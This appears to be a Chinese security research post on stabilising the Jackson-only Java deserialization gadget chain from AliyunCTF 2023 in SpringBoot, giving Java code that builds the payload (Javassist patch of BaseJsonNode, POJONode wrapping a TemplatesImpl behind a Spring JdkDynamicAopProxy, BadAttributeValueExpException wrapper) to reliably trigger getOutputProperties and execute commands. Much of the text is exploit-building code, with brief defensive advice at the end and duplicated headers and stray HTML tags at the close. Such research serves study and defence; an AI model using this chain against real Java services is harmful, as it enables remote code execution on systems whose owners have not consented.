JACKSON反序列化利用链稳定性优化研究<\/h1>

1. 背景与概述<\/h2>
在2023年4月的AliyunCTF中公开了一条仅依赖Jackson库的原生反序列化利用链（JACKSON链），该链可直接在无额外依赖的SpringBoot环境下使用。然而，由于Jackson获取类属性顺序的不稳定性，导致有时在触发`getOutputProperties<\/code>方法前就报错。本文参考ysoserial中的JSON1链，通过添加Spring AOP依赖，对JACKSON链进行改进，使其在SpringBoot环境下能稳定触发目标方法。<\/p>`

2. JACKSON链原理解析<\/h2>
2.1 基本构造流程<\/h3>
JACKSON链的构造分为三个关键步骤：<\/p>


修改BaseJsonNode类<\/strong>：<\/p>
CtClass ctClass =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>get<\/span>(<\/span>"com.fasterxml.jackson.databind.node.BaseJsonNode"<\/span>);<\/span>
<\/span><\/span>CtMethod writeReplace =<\/span> ctClass.<\/span>getDeclaredMethod<\/span>(<\/span>"writeReplace"<\/span>);<\/span>
<\/span><\/span>ctClass.<\/span>removeMethod<\/span>(<\/span>writeReplace);<\/span>
<\/span><\/span>ctClass.<\/span>toClass<\/span>();<\/span>
<\/span><\/span><\/code><\/pre><\/li>

构造POJONode对象<\/strong>：<\/p>
POJONode node =<\/span> new<\/span> POJONode(<\/span>makeTemplatesImpl(<\/span>cmd));<\/span>
<\/span><\/span><\/code><\/pre><\/li>

设置BadAttributeValueExpException<\/strong>：<\/p>
BadAttributeValueExpException val =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>setFieldValue(<\/span>val,<\/span> "val"<\/span>,<\/span> node);<\/span>
<\/span><\/span>return<\/span> serialize(<\/span>val);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.2 攻击原理<\/h3>

POJONode.toString()<\/code>会触发其包装对象的所有getter方法<\/li>
当包装对象为TemplatesImpl<\/code>时，最终会触发getOutputProperties<\/code>方法<\/li>
getOutputProperties<\/code>方法可导致任意类加载，实现代码执行<\/li>
<\/ul>
3. 不稳定性问题分析<\/h2>
3.1 问题表现<\/h3>
在SpringBoot 2.7.5 + OpenJDK 1.8.20环境下，反序列化时可能出现：<\/p>
Caused by:<\/span> java.<\/span>lang<\/span>.<\/span>NullPointerException<\/span>
<\/span><\/span>    at com.<\/span>sun<\/span>.<\/span>org<\/span>.<\/span>apache<\/span>.<\/span>xalan<\/span>.<\/span>internal<\/span>.<\/span>xsltc<\/span>.<\/span>trax<\/span>.<\/span>TemplatesImpl<\/span>.<\/span>getStylesheetDOM<\/span>(<\/span>TemplatesImpl.<\/span>java<\/span>:<\/span>450<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>3.2 根本原因<\/h3>
BeanSerializerBase.serializeFields<\/code>获取TemplatesImpl<\/code>属性的顺序不稳定：<\/p>
protected<\/span> void<\/span> serializeFields<\/span>(<\/span>Object bean,<\/span> JsonGenerator gen,<\/span> SerializerProvider provider)<\/span> {<\/span>
<\/span><\/span>    BeanPropertyWriter[]<\/span> props =<\/span> ...;<\/span>
<\/span><\/span>    for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> props.<\/span>length<\/span>;<\/span> ++<\/span>i)<\/span> {<\/span>
<\/span><\/span>        prop.<\/span>serializeAsField<\/span>(<\/span>bean,<\/span> gen,<\/span> provider);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>可能获取的属性顺序：<\/p>

transletIndex<\/code><\/li>
stylesheetDOM<\/code><\/li>
outputProperties<\/code><\/li>
<\/ol>
当stylesheetDOM<\/code>先于outputProperties<\/code>被触发时，由于_sdom<\/code>成员为空，导致NPE，攻击失败。<\/p>
4. JSON1链的启发<\/h2>
4.1 JSON1链关键思路<\/h3>
ysoserial中的JSON1链通过以下方式确保稳定性：<\/p>

使用JdkDynamicAopProxy<\/code>代理TemplatesImpl<\/code><\/li>
仅暴露Templates<\/code>接口的getOutputProperties<\/code>方法<\/li>
通过代理机制确保只触发目标方法<\/li>
<\/ol>
4.2 关键调用链<\/h3>
TemplatesImpl.getOutputProperties()
  -> Method.invoke()
  -> AopUtils.invokeJoinpointUsingReflection()
  -> JdkDynamicAopProxy.invoke()
  -> $Proxy0.getOutputProperties()
  -> ... [最终触发代码执行]
<\/code><\/pre>
4.3 代理机制优势<\/h3>

代理类只包含接口方法（getOutputProperties<\/code>）<\/li>
避免了Jackson随机触发其他getter方法的问题<\/li>
需要Spring AOP依赖（SpringBoot默认包含）<\/li>
<\/ul>
5. JACKSON链改进方案<\/h2>
5.1 改进后的构造流程<\/h3>
public<\/span> static<\/span> byte<\/span>[]<\/span> getJSON2<\/span>(<\/span>String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 1. 仍然需要移除BaseJsonNode的writeReplace方法
<\/span><\/span><\/span><\/span>    CtClass ctClass =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>get<\/span>(<\/span>"com.fasterxml.jackson.databind.node.BaseJsonNode"<\/span>);<\/span>
<\/span><\/span>    CtMethod writeReplace =<\/span> ctClass.<\/span>getDeclaredMethod<\/span>(<\/span>"writeReplace"<\/span>);<\/span>
<\/span><\/span>    ctClass.<\/span>removeMethod<\/span>(<\/span>writeReplace);<\/span>
<\/span><\/span>    ctClass.<\/span>toClass<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 2. 使用代理对象构造POJONode
<\/span><\/span><\/span><\/span>    POJONode node =<\/span> new<\/span> POJONode(<\/span>makeTemplatesImplAopProxy(<\/span>cmd));<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 3. 构造BadAttributeValueExpException
<\/span><\/span><\/span><\/span>    BadAttributeValueExpException val =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>    setFieldValue(<\/span>val,<\/span> "val"<\/span>,<\/span> node);<\/span>
<\/span><\/span>    return<\/span> serialize(<\/span>val);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.2 代理对象构造方法<\/h3>
public<\/span> static<\/span> Object makeTemplatesImplAopProxy<\/span>(<\/span>String cmd)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 1. 创建AdvisedSupport配置
<\/span><\/span><\/span><\/span>    AdvisedSupport advisedSupport =<\/span> new<\/span> AdvisedSupport();<\/span>
<\/span><\/span>    advisedSupport.<\/span>setTarget<\/span>(<\/span>makeTemplatesImpl(<\/span>cmd));<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 2. 创建JdkDynamicAopProxy
<\/span><\/span><\/span><\/span>    Constructor constructor =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.aop.framework.JdkDynamicAopProxy"<\/span>)<\/span>
<\/span><\/span>                                 .<\/span>getConstructor<\/span>(<\/span>AdvisedSupport.<\/span>class<\/span>);<\/span>
<\/span><\/span>    constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>advisedSupport);<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 3. 创建代理对象
<\/span><\/span><\/span><\/span>    Object proxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>        ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span>
<\/span><\/span>        new<\/span> Class[]{<\/span>Templates.<\/span>class<\/span>},<\/span>
<\/span><\/span>        handler
<\/span><\/span>    );<\/span>
<\/span><\/span>    return<\/span> proxy;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.3 改进效果<\/h3>

BeanSerializerBase.serializeFields<\/code>只会获取到outputProperties<\/code>一个属性<\/li>
确保稳定触发getOutputProperties<\/code>方法<\/li>
避免了因属性顺序导致的NPE问题<\/li>
<\/ul>
6. 技术要点总结<\/h2>


原始JACKSON链问题<\/strong>：<\/p>

依赖Jackson的反射机制触发所有getter<\/li>
属性获取顺序不稳定导致可能失败<\/li>
<\/ul>
<\/li>

改进方案核心<\/strong>：<\/p>

使用Spring AOP的JdkDynamicAopProxy<\/code><\/li>
通过代理限制只暴露目标方法<\/li>
确保稳定触发getOutputProperties<\/code><\/li>
<\/ul>
<\/li>

环境要求<\/strong>：<\/p>

需要Spring AOP依赖（SpringBoot默认满足）<\/li>
兼容原始JACKSON链的使用场景<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

限制Jackson反序列化的类<\/li>
及时更新Jackson版本<\/li>
监控和阻断可疑的反序列化操作<\/li>
<\/ul>
<\/li>
<\/ol>
7. 参考资源<\/h2>

AliyunCTF 2023 Writeup<\/a><\/li>
ysoserial项目<\/li>
Spring AOP文档<\/li>
Jackson官方安全指南<\/li>
<\/ol>

JACKSON反序列化利用链稳定性优化研究<\/h1>

3. 不稳定性问题分析<\/h2>

5. JACKSON链改进方案<\/h2>

7. 参考资源<\/h2> AliyunCTF 2023 Writeup<\/a><\/li> ysoserial项目<\/li> Spring AOP文档<\/li> Jackson官方安全指南<\/li> <\/ol>

7. 参考资源<\/h2>

AliyunCTF 2023 Writeup<\/a><\/li>
ysoserial项目<\/li>
Spring AOP文档<\/li>
Jackson官方安全指南<\/li> <\/ol>